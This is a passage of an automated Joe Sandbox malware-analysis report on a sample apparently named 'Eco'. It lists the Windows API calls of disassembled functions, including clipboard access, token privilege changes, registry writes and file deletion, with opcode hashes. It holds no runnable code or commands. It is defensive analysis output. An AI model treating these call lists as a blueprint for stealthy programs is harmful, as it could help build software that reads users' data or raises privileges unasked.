                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CopyFile
                          • String ID:
                          • API String ID: 1304948518-0
                          • Opcode ID: 97d73735368db41eca19b57d2fdf710da7bc53c1ba8e68d9cc72b8a09ed7897c
                          • Instruction ID: 35e3e74282bc1e27328cdf892275fc415bd6eb66b0594564231662bfa355bcab
                          • Opcode Fuzzy Hash: 97d73735368db41eca19b57d2fdf710da7bc53c1ba8e68d9cc72b8a09ed7897c
                          • Instruction Fuzzy Hash: 1ED0A7315E020CBBEF50DFA0CC06F68B7ACEB12706F1002A4B504D90E0DA7269189795
                          APIs
                          • GetFileAttributesW.KERNEL32(?,00573A6B), ref: 00574E5A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 6085b71edfbe6a55c3363fd655fd823d336e729ec50a5ad3ef335ba652d9ad67
                          • Instruction ID: 871147b7a22c9979878113638a569c13fe0def725ee0c8cba46a2f2f9707eb69
                          • Opcode Fuzzy Hash: 6085b71edfbe6a55c3363fd655fd823d336e729ec50a5ad3ef335ba652d9ad67
                          • Instruction Fuzzy Hash: 27B09224010600459E680E7829081993B08B8937B9FD86B80DC78858E2C3398C8BFA13
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __wfsopen
                          • String ID:
                          • API String ID: 197181222-0
                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                          • Instruction ID: ffc3770441da815e4f20313d2cd63baf420f3201691855219261614c660525d8
                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                          • Instruction Fuzzy Hash: 69B0927644020C77CE012E82EC02A893F19AB806A8F409020FB0C18162A6B3A6609689
                          APIs
                          • _doexit.LIBCMT ref: 005334C4
                            • Part of subcall function 0053338B: __lock.LIBCMT ref: 00533399
                            • Part of subcall function 0053338B: DecodePointer.KERNEL32(005CAEF0,0000001C,005332E4,00530F33,00000001,00000000,?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 005333D8
                            • Part of subcall function 0053338B: DecodePointer.KERNEL32(?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 005333E9
                            • Part of subcall function 0053338B: EncodePointer.KERNEL32(00000000,?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 00533402
                            • Part of subcall function 0053338B: DecodePointer.KERNEL32(-00000004,?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 00533412
                            • Part of subcall function 0053338B: EncodePointer.KERNEL32(00000000,?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 00533418
                            • Part of subcall function 0053338B: DecodePointer.KERNEL32(?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 0053342E
                            • Part of subcall function 0053338B: DecodePointer.KERNEL32(?,00533232,000000FF,?,00539D8E,00000011,00530F33,?,00539BDC,0000000D), ref: 00533439
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Pointer$Decode$Encode$__lock_doexit
                          • String ID:
                          • API String ID: 2158581194-0
                          • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                          • Instruction ID: a885adf2fc31c3c82ead7ad639de2d9f4883153e2bffbdb018caef67f264ddde
                          • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                          • Instruction Fuzzy Hash: 0DB0123158430D33DB112541EC03F853F0C5780B54F104020FA0C1C1E1AAA3766580C9
                          APIs
                            • Part of subcall function 00573E72: FindFirstFileW.KERNEL32(?,?), ref: 00573EE9
                            • Part of subcall function 00573E72: DeleteFileW.KERNEL32(?,?,?,?), ref: 00573F39
                            • Part of subcall function 00573E72: FindNextFileW.KERNEL32(00000000,00000010), ref: 00573F4A
                            • Part of subcall function 00573E72: FindClose.KERNEL32(00000000), ref: 00573F61
                          • GetLastError.KERNEL32 ref: 0057C0FF
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                          • String ID:
                          • API String ID: 2191629493-0
                          • Opcode ID: 269e1fcda33ef4aeb6b9c85fc55ee0b287edbcf3b1fdb786d4c591f3a9f772e1
                          • Instruction ID: 93593db5e78f3bd5f3fcfc6645dbbabcc4cd228f02af46915090e89543dfec78
                          • Opcode Fuzzy Hash: 269e1fcda33ef4aeb6b9c85fc55ee0b287edbcf3b1fdb786d4c591f3a9f772e1
                          • Instruction Fuzzy Hash: D8F082362101158FDB14EF59E855F59BBE4BF85320F04C419F90A97352CB74BC41DB90
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0059CF5A
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059CFB8
                          • GetWindowLongW.USER32(?,000000F0), ref: 0059CFF9
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059D023
                          • SendMessageW.USER32 ref: 0059D04C
                          • _wcsncpy.LIBCMT ref: 0059D0B8
                          • GetKeyState.USER32(00000011), ref: 0059D0D9
                          • GetKeyState.USER32(00000009), ref: 0059D0E6
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059D0FC
                          • GetKeyState.USER32(00000010), ref: 0059D106
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059D12F
                          • SendMessageW.USER32 ref: 0059D156
                          • SendMessageW.USER32(?,00001030,?,0059B735), ref: 0059D25A
                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0059D270
                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0059D283
                          • SetCapture.USER32(?), ref: 0059D28C
                          • ClientToScreen.USER32(?,?), ref: 0059D2F1
                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0059D2FE
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0059D318
                          • ReleaseCapture.USER32 ref: 0059D323
                          • GetCursorPos.USER32(?), ref: 0059D35D
                          • ScreenToClient.USER32(?,?), ref: 0059D36A
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0059D3C6
                          • SendMessageW.USER32 ref: 0059D3F4
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D431
                          • SendMessageW.USER32 ref: 0059D460
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0059D481
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0059D490
                          • GetCursorPos.USER32(?), ref: 0059D4B0
                          • ScreenToClient.USER32(?,?), ref: 0059D4BD
                          • GetParent.USER32(?), ref: 0059D4DD
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0059D546
                          • SendMessageW.USER32 ref: 0059D577
                          • ClientToScreen.USER32(?,?), ref: 0059D5D5
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0059D605
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D62F
                          • SendMessageW.USER32 ref: 0059D652
                          • ClientToScreen.USER32(?,?), ref: 0059D6A4
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0059D6D8
                            • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
                          • GetWindowLongW.USER32(?,000000F0), ref: 0059D774
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                          • String ID: @GUI_DRAGID$F$pr]
                          • API String ID: 3977979337-1567868113
                          • Opcode ID: d021c4c578245dd4b7050fc7777143c9405c18527525520363e40bee79ddc46a
                          • Instruction ID: 1b578b2e4f6c8526c3ca8ffa530fca2600f8bfcd869486e06559c6c0aa117a36
                          • Opcode Fuzzy Hash: d021c4c578245dd4b7050fc7777143c9405c18527525520363e40bee79ddc46a
                          • Instruction Fuzzy Hash: 61429034104341AFDB20CF64C888EAABFF5FF89714F14491AF659872A1D731E859EBA1
                          APIs
                            • Part of subcall function 0056917C: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005691C6
                            • Part of subcall function 0056917C: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005691F3
                            • Part of subcall function 0056917C: GetLastError.KERNEL32 ref: 00569200
                          • _memset.LIBCMT ref: 00568D54
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00568DA6
                          • CloseHandle.KERNEL32(?), ref: 00568DB7
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00568DCE
                          • GetProcessWindowStation.USER32 ref: 00568DE7
                          • SetProcessWindowStation.USER32(00000000), ref: 00568DF1
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00568E0B
                            • Part of subcall function 00568BCC: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568D0A), ref: 00568BE1
                            • Part of subcall function 00568BCC: CloseHandle.KERNEL32(?,?,00568D0A), ref: 00568BF3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                          • String ID: $default$winsta0
                          • API String ID: 2063423040-1027155976
                          • Opcode ID: 3f04510446c5777edf517248bd095a3b8444fe279ecda5dfde5f5e8b0d460141
                          • Instruction ID: ceaa60eb76256f4c93456ac51adb621fc9a596038b08c895f883a78b3eeddb8e
                          • Opcode Fuzzy Hash: 3f04510446c5777edf517248bd095a3b8444fe279ecda5dfde5f5e8b0d460141
                          • Instruction Fuzzy Hash: 04815871810209AFDF119FA4DC49AFEBFB9FF05304F14425AF911A72A1DB319E689B60
                          APIs
                          • OpenClipboard.USER32(005A0980), ref: 00584440
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0058444E
                          • GetClipboardData.USER32(0000000D), ref: 00584456
                          • CloseClipboard.USER32 ref: 00584462
                          • GlobalLock.KERNEL32(00000000), ref: 0058447E
                          • CloseClipboard.USER32 ref: 00584488
                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0058449D
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 005844AA
                          • GetClipboardData.USER32(00000001), ref: 005844B2
                          • GlobalLock.KERNEL32(00000000), ref: 005844BF
                          • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 005844F3
                          • CloseClipboard.USER32 ref: 00584603
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                          • String ID:
                          • API String ID: 3222323430-0
                          • Opcode ID: fa985b577a29bf7da724e6684f003439dc7ba20de5f61887acb4a91dc2abbd7e
                          • Instruction ID: 013a412f3366346c21be365e99117d838a926a9d9458d120eb3f17de1293c564
                          • Opcode Fuzzy Hash: fa985b577a29bf7da724e6684f003439dc7ba20de5f61887acb4a91dc2abbd7e
                          • Instruction Fuzzy Hash: 84517D35244203ABD700FB60EC49F6E7BA8BFE5B51F004529F956A32E1DB7099099F62
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 0057CC3D
                          • FindClose.KERNEL32(00000000), ref: 0057CC91
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057CCB6
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057CCCD
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0057CCF4
                          • __swprintf.LIBCMT ref: 0057CD40
                          • __swprintf.LIBCMT ref: 0057CD83
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • __swprintf.LIBCMT ref: 0057CDD7
                            • Part of subcall function 005337FA: __woutput_l.LIBCMT ref: 00533853
                          • __swprintf.LIBCMT ref: 0057CE25
                            • Part of subcall function 005337FA: __flsbuf.LIBCMT ref: 00533875
                            • Part of subcall function 005337FA: __flsbuf.LIBCMT ref: 0053388D
                          • __swprintf.LIBCMT ref: 0057CE74
                          • __swprintf.LIBCMT ref: 0057CEC3
                          • __swprintf.LIBCMT ref: 0057CF12
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                          • API String ID: 3953360268-2428617273
                          • Opcode ID: 1a7a23701d2639a84f0a59299f0256c3f87d5dc85c2f7ad6afe0d00289b56e1e
                          • Instruction ID: 12659f7f16b25c6512d681c18ec324bbaf282ccd3458ee1db76205204b76b254
                          • Opcode Fuzzy Hash: 1a7a23701d2639a84f0a59299f0256c3f87d5dc85c2f7ad6afe0d00289b56e1e
                          • Instruction Fuzzy Hash: 0BA14BB1404205ABD714EFA4D98ADAFBBECFFD5700F40491DF59582191EB30EA49CBA2
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0057F466
                          • _wcscmp.LIBCMT ref: 0057F47B
                          • _wcscmp.LIBCMT ref: 0057F492
                          • GetFileAttributesW.KERNEL32(?), ref: 0057F4A4
                          • SetFileAttributesW.KERNEL32(?,?), ref: 0057F4BE
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0057F4D6
                          • FindClose.KERNEL32(00000000), ref: 0057F4E1
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0057F4FD
                          • _wcscmp.LIBCMT ref: 0057F524
                          • _wcscmp.LIBCMT ref: 0057F53B
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0057F54D
                          • SetCurrentDirectoryW.KERNEL32(005C98F8), ref: 0057F56B
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F575
                          • FindClose.KERNEL32(00000000), ref: 0057F582
                          • FindClose.KERNEL32(00000000), ref: 0057F594
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1803514871-438819550
                          • Opcode ID: 8219bf89190ee17adb3c7b90d468c525d46d2c09adb48040cdb1a9f6e316a21d
                          • Instruction ID: bf69cf341e3bf7ae95f81b96e040cf2cb8b37ea0c548f38ec5e35f3b0707baa6
                          • Opcode Fuzzy Hash: 8219bf89190ee17adb3c7b90d468c525d46d2c09adb48040cdb1a9f6e316a21d
                          • Instruction Fuzzy Hash: 83317F355013196FDB20DFA4EC4DADE7BACBF5A320F104166F819E3190EB34DA44AB64
                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590D7B
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,005A0980,00000000,?,00000000,?,?), ref: 00590DE9
                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00590E31
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00590EBA
                          • RegCloseKey.ADVAPI32(?), ref: 005911DA
                          • RegCloseKey.ADVAPI32(00000000), ref: 005911E7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Close$ConnectCreateRegistryValue
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 536824911-966354055
                          • Opcode ID: de3073bb341c5a2b0f93924460eff82ba65e24d9e81c6be746c65e172c7a9883
                          • Instruction ID: bac5937ff80f85a70859bf40435a2af44d1042a4b87d15dbf0edfb99552f5494
                          • Opcode Fuzzy Hash: de3073bb341c5a2b0f93924460eff82ba65e24d9e81c6be746c65e172c7a9883
                          • Instruction Fuzzy Hash: D3028075200A129FDB14DF14D859E6ABBE5FF89314F04895DF84A9B3A2CB30ED41CB81
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0057F5C3
                          • _wcscmp.LIBCMT ref: 0057F5D8
                          • _wcscmp.LIBCMT ref: 0057F5EF
                            • Part of subcall function 005746E2: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005746FD
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0057F61E
                          • FindClose.KERNEL32(00000000), ref: 0057F629
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0057F645
                          • _wcscmp.LIBCMT ref: 0057F66C
                          • _wcscmp.LIBCMT ref: 0057F683
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0057F695
                          • SetCurrentDirectoryW.KERNEL32(005C98F8), ref: 0057F6B3
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F6BD
                          • FindClose.KERNEL32(00000000), ref: 0057F6CA
                          • FindClose.KERNEL32(00000000), ref: 0057F6DC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 1824444939-438819550
                          • Opcode ID: 9993ebe3c640a68a64c7bbf1cc7566474ca6b891430ee32e808354825387e083
                          • Instruction ID: e6852627da863673c4520a06dfb2d60db17e3de8513b14a0a26aa43fde9308be
                          • Opcode Fuzzy Hash: 9993ebe3c640a68a64c7bbf1cc7566474ca6b891430ee32e808354825387e083
                          • Instruction Fuzzy Hash: D931D33650021A6EDF20DFA4EC4DADE7FACBF56324F104165E819A31E1DB319E44EB64
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 0057E18C
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0057E19C
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0057E1A8
                          • __wsplitpath.LIBCMT ref: 0057E206
                          • _wcscat.LIBCMT ref: 0057E21E
                          • _wcscat.LIBCMT ref: 0057E230
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0057E245
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E259
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E28B
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E2AC
                          • _wcscpy.LIBCMT ref: 0057E2B8
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0057E2F7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                          • String ID: *.*
                          • API String ID: 3566783562-438819550
                          • Opcode ID: 3b85a9f8d728a23cc5a166fd4788d5822d6cac6e7d8dcd6a30ba054a3e41fc6b
                          • Instruction ID: 5f15ce53ff8147f80d5d1683265e6bb655d5762f18dcc465d27b13bd457197de
                          • Opcode Fuzzy Hash: 3b85a9f8d728a23cc5a166fd4788d5822d6cac6e7d8dcd6a30ba054a3e41fc6b
                          • Instruction Fuzzy Hash: 4D619B755047029FDB10EF60D88A99EBBE8FF89310F04895DF88983251EB31E945CB92
                          APIs
                            • Part of subcall function 00568C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568C1F
                            • Part of subcall function 00568C03: GetLastError.KERNEL32(?,005686E3,?,?,?), ref: 00568C29
                            • Part of subcall function 00568C03: GetProcessHeap.KERNEL32(00000008,?,?,005686E3,?,?,?), ref: 00568C38
                            • Part of subcall function 00568C03: HeapAlloc.KERNEL32(00000000,?,005686E3,?,?,?), ref: 00568C3F
                            • Part of subcall function 00568C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568C56
                            • Part of subcall function 00568CA0: GetProcessHeap.KERNEL32(00000008,005686F9,00000000,00000000,?,005686F9,?), ref: 00568CAC
                            • Part of subcall function 00568CA0: HeapAlloc.KERNEL32(00000000,?,005686F9,?), ref: 00568CB3
                            • Part of subcall function 00568CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005686F9,?), ref: 00568CC4
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00568714
                          • _memset.LIBCMT ref: 00568729
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00568748
